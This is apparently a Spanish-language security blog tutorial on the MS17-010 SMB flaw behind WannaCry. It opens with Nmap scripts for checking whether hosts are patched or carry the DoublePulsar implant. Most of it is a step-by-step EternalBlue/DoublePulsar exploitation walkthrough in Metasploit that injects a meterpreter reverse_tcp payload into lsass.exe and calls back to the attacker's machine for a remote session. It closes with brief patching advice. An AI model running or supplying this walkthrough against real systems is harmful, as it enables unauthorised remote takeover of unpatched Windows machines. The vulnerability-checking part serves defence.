El vector de propagación del malware WANNACRY se vale de una vulnerabilidad en SMB, desde el 14 de marzo, Microsoft resolvió el problema a través del parche de seguridad MS17-010, para todas las versiones de Windows.
Empecemos por verificar si nuestro sistema está parcheado contra este exploit llamado EternalBlue, ten en cuenta que se vienen más ataques aprovechándose de esta vulnerabilidad.
Para eso descargamos el siguiente script que revisa los archivos de actualización en el sistema y busca aquellos correspondientes al parche de EternalBlue. Puedes descargar estes script desde este enlace.
Como segunda opción podemos usar el script NSE de Nmap para detectar equipos Windows vulnerables a la ejecución de código remoto ms17-010 que el pasado domingo publicó nuestro buen amigo Calderpwn.
https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/smb-vuln-ms17-010.nse
Modo de uso:
-Para verificar que un equipo está parchado o no:
$ nmap -p445 --script smb-vuln-ms17-010 <objetivo>
-Para verificar que no tenga el implante DOUBLE PULSAR:
$ nmap -p445 --script smb-double-pulsar-backdoor <objetivo>
EXPLOTANDO MS17-010
ETERNALBLUE es el nombre del exploit que le permite a WannaCrypt autoreplicarse y propagarse rápidamente por la red infectada.
Al parecer, fue desarrollado por la NSA y pertenece a la lista de archivos filtrados por el grupo Shadow Brokers.
ETERNALBLUE es el único que puede ser usado para atacar Windows 7 y Windows Server 2008 sin necesidad de autenticación. Luego, podemos
utilizar DOUBLEPULSAR para inyectar remotamente una DLL maliciosa en el equipo previamente atacado con ETERNALBLUE. Teniendo en cuenta que podemos inyectar la DLL que queramos, crearemos mediante Empire, una DLL maliciosa que realice una conexión inversa desde el equipo víctima hacia el equipo atacante.
Creamos una carpeta e ingresamos a este directorio desde la terminal y ponemos lo siguiente:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
Nos vamos al directorio donde hemos descargado el repositorio e ingresamos a la carpeta
Copiamos el modulo (eternalblue_doublepusar.rb) a metasploit,en la carpeta donde se encuentran los exploits para SMB de Windows.
Abrimos Metasploit, seleccionaremos el exploit que acabamos de añadir
use exploits/windows/smb/eternalblue_doublepulsar
Con show options nos mostrara los parámetros que le debemos de configurar:
En los parámetros DOUBLEPULSARPATH y ETERNALBLUEPATH ponemos el directorio donde se encuentra la carpeta “deps” que hemos descargado previamente.
En PROCESSINJECT recibe el nombre del proceso donde va a ser inyectado en la máquina target el payload, si nuestro target es de x64 cambiamos el proceso wlms.exe a lsass.exe. Si el target es un x86, debemos dejarlo en wlms.exe.
En RHOST ponemos la IP de la máquina a atacar.
En WINEPATH ponemos el directorio donde se encuentra el “drive_c” de WINE.
Ponemos el payload que vamos a utilizar:
set payload windows/x64/meterpreter/reverse_tcp
Configuramos el payload con:
set LHOST ip del atacante
El puerto lo dejaremos por default en el 4444
Por ultimo lanzamos con exploit
Como verán ya hemos accedido al sistema Windows, solo requerimos la dirección IP de la víctima y nos devolverá una sesión de meterpreter.
Recomendaciones
Si tu equipo es vulnerable simplemente instala el parche.
1.- Click en Windows Update
2.- Instalar actualizaciones
3.-Antivirus actualizado
4.-No abrir archivos adjuntos en correos que no identifican!
By Torres Happy Hacking